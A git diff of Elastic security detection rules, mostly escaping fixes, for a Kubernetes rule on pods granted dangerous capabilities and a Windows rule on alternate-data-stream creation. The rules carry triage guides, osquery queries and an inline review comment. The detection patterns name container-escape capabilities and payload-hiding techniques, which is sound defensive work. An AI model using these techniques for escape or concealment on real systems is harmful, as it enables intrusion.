ptrace(2).\nSYS_RAWIO - Perform I/O port operations (iopl(2) and ioperm(2)).\nSYSLOG - Perform privileged syslog(2) operations.\n\n### False positive analysis\n\n- While these capabilities are not included by default in containers, some legitimate images may need to add them. This rule leaves space for the exception of trusted container images. To add an exception, add the trusted container image name to the query field, kubernetes.audit.requestObject.spec.containers.image.",
+ "query": "event.dataset: kubernetes.audit_logs\n and kubernetes.audit.annotations.authorization_k8s_io/decision:\"allow\"\n and kubernetes.audit.verb: create\n and kubernetes.audit.objectRef.resource: pods\n and kubernetes.audit.requestObject.spec.containers.securityContext.capabilities.add: (\"BPF\" or \"DAC_READ_SEARCH\" or \"NET_ADMIN\" or \"SYS_ADMIN\" or \"SYS_BOOT\" or \"SYS_MODULE\" or \"SYS_PTRACE\" or \"SYS_RAWIO\" or \"SYSLOG\")\n and not kubernetes.audit.requestObject.spec.containers.image : (\"docker.elastic.co/beats/elastic-agent:8.4.0\" or \"rancher/klipper-lb:v0.3.5\" or \"\")\n",
+ "references": [
+ "https://kubernetes.io/docs/tasks/configure-pod-container/security-context/#set-capabilities-for-a-container",
+ "https://0xn3va.gitbook.io/cheat-sheets/container/escaping/excessive-capabilities",
+ "https://man7.org/linux/man-pages/man7/capabilities.7.html",
+ "https://docs.docker.com/engine/reference/run/#runtime-privilege-and-linux-capabilities"
+ ],
+ "related_integrations": [
+ {
+ "package": "kubernetes",
+ "version": "^1.4.1"
+ }
+ ],
+ "required_fields": [
+ {
+ "ecs": true,
+ "name": "event.dataset",
+ "type": "keyword"
+ },
+ {
+ "ecs": false,
+ "name": "kubernetes.audit.annotations.authorization_k8s_io/decision",
+ "type": "keyword"
+ },
+ {
+ "ecs": false,
+ "name": "kubernetes.audit.objectRef.resource",
+ "type": "keyword"
+ },
+ {
+ "ecs": false,
+ "name": "kubernetes.audit.requestObject.spec.containers.image",
+ "type": "text"
+ },
+ {
+ "ecs": false,
+ "name": "kubernetes.audit.requestObject.spec.containers.securityContext.capabilities.add",
+ "type": "keyword"
+ },
+ {
+ "ecs": false,
+ "name": "kubernetes.audit.verb",
+ "type": "keyword"
+ }
+ ],
+ "risk_score": 47,
+ "rule_id": "7164081a-3930-11ed-a261-0242ac120002",
+ "setup": "The Kubernetes Fleet integration with Audit Logs enabled or similarly structured data is required to be compatible with this rule.",
+ "severity": "medium",
+ "tags": [
+ "Data Source: Kubernetes",
+ "Tactic: Execution",
+ "Tactic: Privilege Escalation"
+ ],
+ "threat": [
+ {
+ "framework": "MITRE ATT&CK",
+ "tactic": {
+ "id": "TA0004",
+ "name": "Privilege Escalation",
+ "reference": "https://attack.mitre.org/tactics/TA0004/"
+ },
+ "technique": [
+ {
+ "id": "T1611",
+ "name": "Escape to Host",
+ "reference": "https://attack.mitre.org/techniques/T1611/"
+ }
+ ]
+ },
+ {
+ "framework": "MITRE ATT&CK",
+ "tactic": {
+ "id": "TA0002",
+ "name": "Execution",
+ "reference": "https://attack.mitre.org/tactics/TA0002/"
+ },
+ "technique": [
+ {
+ "id": "T1610",
+ "name": "Deploy Container",
+ "reference": "https://attack.mitre.org/techniques/T1610/"
+ }
+ ]
+ }
+ ],
+ "timestamp_override": "event.ingested",
+ "type": "query",
+ "version": 4
+ },
+ "id": "7164081a-3930-11ed-a261-0242ac120002_4",
+ "type": "security-rule"
+}
\ No newline at end of file
diff --git a/packages/security_detection_engine/kibana/security_rule/717f82c2-7741-4f9b-85b8-d06aeb853f4f_103.json b/packages/security_detection_engine/kibana/security_rule/717f82c2-7741-4f9b-85b8-d06aeb853f4f_103.json
index a65f8bf29e9..78bbfe8b089 100644
--- a/packages/security_detection_engine/kibana/security_rule/717f82c2-7741-4f9b-85b8-d06aeb853f4f_103.json
+++ b/packages/security_detection_engine/kibana/security_rule/717f82c2-7741-4f9b-85b8-d06aeb853f4f_103.json
@@ -58,7 +58,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0004",
 "name": "Privilege Escalation",
diff --git a/packages/security_detection_engine/kibana/security_rule/717f82c2-7741-4f9b-85b8-d06aeb853f4f_104.json b/packages/security_detection_engine/kibana/security_rule/717f82c2-7741-4f9b-85b8-d06aeb853f4f_104.json
index 5dbe2cb3073..65350d74fd3 100644
--- a/packages/security_detection_engine/kibana/security_rule/717f82c2-7741-4f9b-85b8-d06aeb853f4f_104.json
+++ b/packages/security_detection_engine/kibana/security_rule/717f82c2-7741-4f9b-85b8-d06aeb853f4f_104.json
@@ -57,7 +57,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0004",
 "name": "Privilege Escalation",
diff --git a/packages/security_detection_engine/kibana/security_rule/717f82c2-7741-4f9b-85b8-d06aeb853f4f_105.json b/packages/security_detection_engine/kibana/security_rule/717f82c2-7741-4f9b-85b8-d06aeb853f4f_105.json
index e5712619a5c..ead90899bec 100644
--- a/packages/security_detection_engine/kibana/security_rule/717f82c2-7741-4f9b-85b8-d06aeb853f4f_105.json
+++ b/packages/security_detection_engine/kibana/security_rule/717f82c2-7741-4f9b-85b8-d06aeb853f4f_105.json
@@ -62,7 +62,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0004",
 "name": "Privilege Escalation",
diff --git a/packages/security_detection_engine/kibana/security_rule/717f82c2-7741-4f9b-85b8-d06aeb853f4f_106.json b/packages/security_detection_engine/kibana/security_rule/717f82c2-7741-4f9b-85b8-d06aeb853f4f_106.json
index 90cfc1cf60a..82160b43461 100644
--- a/packages/security_detection_engine/kibana/security_rule/717f82c2-7741-4f9b-85b8-d06aeb853f4f_106.json
+++ b/packages/security_detection_engine/kibana/security_rule/717f82c2-7741-4f9b-85b8-d06aeb853f4f_106.json
@@ -63,7 +63,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0004",
 "name": "Privilege Escalation",
diff --git a/packages/security_detection_engine/kibana/security_rule/717f82c2-7741-4f9b-85b8-d06aeb853f4f_207.json b/packages/security_detection_engine/kibana/security_rule/717f82c2-7741-4f9b-85b8-d06aeb853f4f_207.json
index 90bb1b0401f..fe9f288d456 100644
--- a/packages/security_detection_engine/kibana/security_rule/717f82c2-7741-4f9b-85b8-d06aeb853f4f_207.json
+++ b/packages/security_detection_engine/kibana/security_rule/717f82c2-7741-4f9b-85b8-d06aeb853f4f_207.json
@@ -70,7 +70,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0004",
 "name": "Privilege Escalation",
diff --git a/packages/security_detection_engine/kibana/security_rule/717f82c2-7741-4f9b-85b8-d06aeb853f4f_208.json b/packages/security_detection_engine/kibana/security_rule/717f82c2-7741-4f9b-85b8-d06aeb853f4f_208.json
index 26cbc6c8df9..40731d27efd 100644
--- a/packages/security_detection_engine/kibana/security_rule/717f82c2-7741-4f9b-85b8-d06aeb853f4f_208.json
+++ b/packages/security_detection_engine/kibana/security_rule/717f82c2-7741-4f9b-85b8-d06aeb853f4f_208.json
@@ -70,7 +70,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0004",
 "name": "Privilege Escalation",
diff --git a/packages/security_detection_engine/kibana/security_rule/71bccb61-e19b-452f-b104-79a60e546a95_105.json b/packages/security_detection_engine/kibana/security_rule/71bccb61-e19b-452f-b104-79a60e546a95_105.json
index 4a8babbec73..6a24c739248 100644
--- a/packages/security_detection_engine/kibana/security_rule/71bccb61-e19b-452f-b104-79a60e546a95_105.json
+++ b/packages/security_detection_engine/kibana/security_rule/71bccb61-e19b-452f-b104-79a60e546a95_105.json
@@ -13,7 +13,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Unusual File Creation - Alternate Data Stream", - "note": "## Triage and analysis\n\n### Investigating Unusual File Creation - Alternate Data Stream\n\nAlternate Data Streams (ADS) are file attributes only found on the NTFS file system. In this file system, files are built up from a couple of attributes; one of them is $Data, also known as the data attribute.\n\nThe regular data stream, also referred to as the unnamed data stream since the name string of this attribute is empty, contains the data inside the file. So any data stream that has a name is considered an alternate data stream.\n\nAttackers can abuse these alternate data streams to hide malicious files, string payloads, etc. This rule detects the creation of alternate data streams on highly targeted file types.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Retrieve the contents of the alternate data stream, and analyze it for potential maliciousness. Analysts can use the following PowerShell cmdlet to accomplish this:\n - `Get-Content C:\\Path\\To\\file.exe -stream SampleAlternateDataStreamName`\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - $osquery_0\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - $osquery_1\n - $osquery_2\n - $osquery_3\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. 
Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n\n### False positive analysis\n\n- If this activity is expected and noisy in your environment, consider adding exceptions \u2014 preferably with a combination of process executable and file conditions.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", + "note": "## Triage and analysis\n\n### Investigating Unusual File Creation - Alternate Data Stream\n\nAlternate Data Streams (ADS) are file attributes only found on the NTFS file system. 
In this file system, files are built up from a couple of attributes; one of them is $Data, also known as the data attribute.\n\nThe regular data stream, also referred to as the unnamed data stream since the name string of this attribute is empty, contains the data inside the file. So any data stream that has a name is considered an alternate data stream.\n\nAttackers can abuse these alternate data streams to hide malicious files, string payloads, etc. This rule detects the creation of alternate data streams on highly targeted file types.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Retrieve the contents of the alternate data stream, and analyze it for potential maliciousness. Analysts can use the following PowerShell cmdlet to accomplish this:\n - `Get-Content C:\\Path\\To\\file.exe -stream SampleAlternateDataStreamName`\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - $osquery_0\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - $osquery_1\n - $osquery_2\n - $osquery_3\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. 
Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n\n### False positive analysis\n\n- If this activity is expected and noisy in your environment, consider adding exceptions \u2014 preferably with a combination of process executable and file conditions.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", "query": "file where host.os.type == \"windows\" and event.type == \"creation\" and\n\n file.path : \"C:\\\\*:*\" and\n not file.path : \"C:\\\\*:zone.identifier*\" and\n\n not process.executable :\n (\"?:\\\\windows\\\\System32\\\\svchost.exe\",\n \"?:\\\\Windows\\\\System32\\\\inetsrv\\\\w3wp.exe\",\n \"?:\\\\Windows\\\\explorer.exe\",\n \"?:\\\\Windows\\\\System32\\\\sihost.exe\",\n \"?:\\\\Windows\\\\System32\\\\PickerHost.exe\",\n \"?:\\\\Windows\\\\System32\\\\SearchProtocolHost.exe\",\n \"?:\\\\Program Files (x86)\\\\Dropbox\\\\Client\\\\Dropbox.exe\",\n \"?:\\\\Program Files\\\\Rivet Networks\\\\SmartByte\\\\SmartByteNetworkService.exe\",\n \"?:\\\\Program Files (x86)\\\\Microsoft\\\\Edge\\\\Application\\\\msedge.exe\",\n \"?:\\\\Program Files\\\\ExpressConnect\\\\ExpressConnectNetworkService.exe\",\n \"?:\\\\Program Files (x86)\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe\",\n \"?:\\\\Program Files\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe\",\n \"?:\\\\Program Files\\\\Mozilla Firefox\\\\firefox.exe\") and\n\n file.extension :\n (\n \"pdf\",\n \"dll\",\n \"png\",\n \"exe\",\n \"dat\",\n \"com\",\n \"bat\",\n \"cmd\",\n \"sys\",\n \"vbs\",\n \"ps1\",\n \"hta\",\n \"txt\",\n \"vbe\",\n \"js\",\n \"wsh\",\n \"docx\",\n \"doc\",\n \"xlsx\",\n \"xls\",\n \"pptx\",\n \"ppt\",\n \"rtf\",\n \"gif\",\n \"jpg\",\n \"png\",\n \"bmp\",\n \"img\",\n \"iso\"\n )\n", "related_integrations": [ { 
@@ -54,7 +54,7 @@
 ],
 "risk_score": 47,
 "rule_id": "71bccb61-e19b-452f-b104-79a60e546a95",
- "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "medium",
 "tags": [
 "Elastic",
@@ -66,7 +66,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
diff --git a/packages/security_detection_engine/kibana/security_rule/71bccb61-e19b-452f-b104-79a60e546a95_106.json b/packages/security_detection_engine/kibana/security_rule/71bccb61-e19b-452f-b104-79a60e546a95_106.json
index 40041e44167..371a4369cf7 100644
--- a/packages/security_detection_engine/kibana/security_rule/71bccb61-e19b-452f-b104-79a60e546a95_106.json
+++ b/packages/security_detection_engine/kibana/security_rule/71bccb61-e19b-452f-b104-79a60e546a95_106.json
@@ -13,7 +13,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Unusual File Creation - Alternate Data Stream", - "note": "## Triage and analysis\n\n### Investigating Unusual File Creation - Alternate Data Stream\n\nAlternate Data Streams (ADS) are file attributes only found on the NTFS file system. In this file system, files are built up from a couple of attributes; one of them is $Data, also known as the data attribute.\n\nThe regular data stream, also referred to as the unnamed data stream since the name string of this attribute is empty, contains the data inside the file. So any data stream that has a name is considered an alternate data stream.\n\nAttackers can abuse these alternate data streams to hide malicious files, string payloads, etc. This rule detects the creation of alternate data streams on highly targeted file types.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Retrieve the contents of the alternate data stream, and analyze it for potential maliciousness. Analysts can use the following PowerShell cmdlet to accomplish this:\n - `Get-Content C:\\Path\\To\\file.exe -stream SampleAlternateDataStreamName`\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal 
Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n\n### False positive analysis\n\n- If this activity is expected and noisy in your environment, consider adding exceptions \u2014 preferably with a combination of process executable and file conditions.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", + "note": "## Triage and analysis\n\n### Investigating Unusual File Creation - Alternate Data Stream\n\nAlternate Data Streams (ADS) are file attributes only found on the NTFS file system. In this file system, files are built up from a couple of attributes; one of them is $Data, also known as the data attribute.\n\nThe regular data stream, also referred to as the unnamed data stream since the name string of this attribute is empty, contains the data inside the file. So any data stream that has a name is considered an alternate data stream.\n\nAttackers can abuse these alternate data streams to hide malicious files, string payloads, etc. This rule detects the creation of alternate data streams on highly targeted file types.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Retrieve the contents of the alternate data stream, and analyze it for potential maliciousness. Analysts can use the following PowerShell cmdlet to accomplish this:\n - `Get-Content C:\\Path\\To\\file.exe -stream SampleAlternateDataStreamName`\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal 
Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n\n### False positive analysis\n\n- If this activity is expected and noisy in your environment, consider adding exceptions \u2014 preferably with a combination of process executable and file conditions.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", "query": "file where host.os.type == \"windows\" and event.type == \"creation\" and\n\n file.path : \"C:\\\\*:*\" and\n not file.path : \"C:\\\\*:zone.identifier*\" and\n\n not process.executable :\n (\"?:\\\\windows\\\\System32\\\\svchost.exe\",\n \"?:\\\\Windows\\\\System32\\\\inetsrv\\\\w3wp.exe\",\n \"?:\\\\Windows\\\\explorer.exe\",\n \"?:\\\\Windows\\\\System32\\\\sihost.exe\",\n \"?:\\\\Windows\\\\System32\\\\PickerHost.exe\",\n \"?:\\\\Windows\\\\System32\\\\SearchProtocolHost.exe\",\n \"?:\\\\Program Files (x86)\\\\Dropbox\\\\Client\\\\Dropbox.exe\",\n \"?:\\\\Program Files\\\\Rivet Networks\\\\SmartByte\\\\SmartByteNetworkService.exe\",\n \"?:\\\\Program Files (x86)\\\\Microsoft\\\\Edge\\\\Application\\\\msedge.exe\",\n \"?:\\\\Program Files\\\\ExpressConnect\\\\ExpressConnectNetworkService.exe\",\n \"?:\\\\Program Files (x86)\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe\",\n \"?:\\\\Program Files\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe\",\n \"?:\\\\Program Files\\\\Mozilla Firefox\\\\firefox.exe\") and\n\n file.extension :\n (\n \"pdf\",\n \"dll\",\n \"png\",\n \"exe\",\n \"dat\",\n \"com\",\n \"bat\",\n \"cmd\",\n \"sys\",\n \"vbs\",\n \"ps1\",\n \"hta\",\n \"txt\",\n \"vbe\",\n \"js\",\n \"wsh\",\n \"docx\",\n \"doc\",\n \"xlsx\",\n \"xls\",\n \"pptx\",\n \"ppt\",\n \"rtf\",\n \"gif\",\n \"jpg\",\n \"png\",\n \"bmp\",\n \"img\",\n \"iso\"\n )\n", "related_integrations": [ { 
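Review bot: The investigation guide on the new `"note"` line still says `searching for login events (for example, 4624) to the target host after the registry modification`, but this rule fires on alternate-data-stream file creation, not a registry change, so the sentence reads as carried over from another guide and should end `... to the target host after the file creation.` The `file.extension` list in the adjacent `"query"` context also carries `"png"` twice, which is harmless but worth collapsing to a single entry. The same guide text and duplicate entry appear in the `@@ -13,7 +13,7 @@` hunk for the `_107` copy of this rule; since these rule JSON files look like generated per-version copies, the fix belongs in the rule source rather than in this package. The `process.executable` exclusions are matched on path alone — if the indexed events carry code-signature fields, pairing the browser and service entries with a trusted-signature condition would keep the allow-list from also covering anything else that runs under those paths, though the available fields can't be confirmed from this hunk.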
@@ -54,7 +54,7 @@
 ],
 "risk_score": 47,
 "rule_id": "71bccb61-e19b-452f-b104-79a60e546a95",
- "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "medium",
 "tags": [
 "Elastic",
@@ -66,7 +66,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
diff --git a/packages/security_detection_engine/kibana/security_rule/71bccb61-e19b-452f-b104-79a60e546a95_107.json b/packages/security_detection_engine/kibana/security_rule/71bccb61-e19b-452f-b104-79a60e546a95_107.json
index 5090d38f377..f66fc9f5403 100644
--- a/packages/security_detection_engine/kibana/security_rule/71bccb61-e19b-452f-b104-79a60e546a95_107.json
+++ b/packages/security_detection_engine/kibana/security_rule/71bccb61-e19b-452f-b104-79a60e546a95_107.json
